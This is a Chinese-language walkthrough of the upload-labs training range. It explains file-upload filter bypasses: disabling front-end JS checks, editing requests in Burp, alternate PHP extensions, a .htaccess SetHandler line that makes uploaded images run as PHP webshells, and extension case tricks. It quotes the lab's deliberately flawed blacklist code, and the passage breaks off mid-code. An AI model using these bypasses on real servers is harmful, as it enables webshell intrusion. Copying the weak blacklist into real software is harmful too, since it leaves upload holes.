upload-labs实战
本文使用的环境来自于:
https://github.com/c0ny1/upload-labs
先来个思维导图看清楚接下来一共有哪些绕过方法。
客户端
1、js检查
Pass 01
通常在上传页面里含有专门检测文件上传的JavaScript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。
查看源代码发现对上传文件类型进行了限制
绕过方法
(1) 直接删除代码中onsubmit事件中关于文件上传时校验文件的代码即可。
或者不加载js,还可以将html源码copy一份到本地,然后对相应代码进行修改,本地提交即可。
(2) burp改包,由于是前端js校验,可以先将文件重命名为js允许上传的后缀名,然后burp抓包修改上传文件的后缀,以此绕过前端js校验。
上传成功。
服务端
检查后缀
黑名单
1、上传特殊可解析后缀
Pass 03
这里做了黑名单处理,我们可以通过特殊可解析后缀进行绕过。
绕过方法:
在文件上传漏洞中总结过,这里可以使用php3,phtml等绕过。
2、上传.htaccess
Pass-04
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置,通过.htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
查看源码,发现做了黑名单限制。
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
?>
但是黑名单没有限制.htaccess。
绕过方法:
我们上传一个.htaccess文件,内容为:
SetHandler application/x-httpd-php
这样所有的文件都会解析为php,接下来上传图片马就可以了。
3、后缀大小写绕过
Pass-05
查看源代码,发现对.htaccess也进行了检测,但是没有对大小写进行统一。
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!'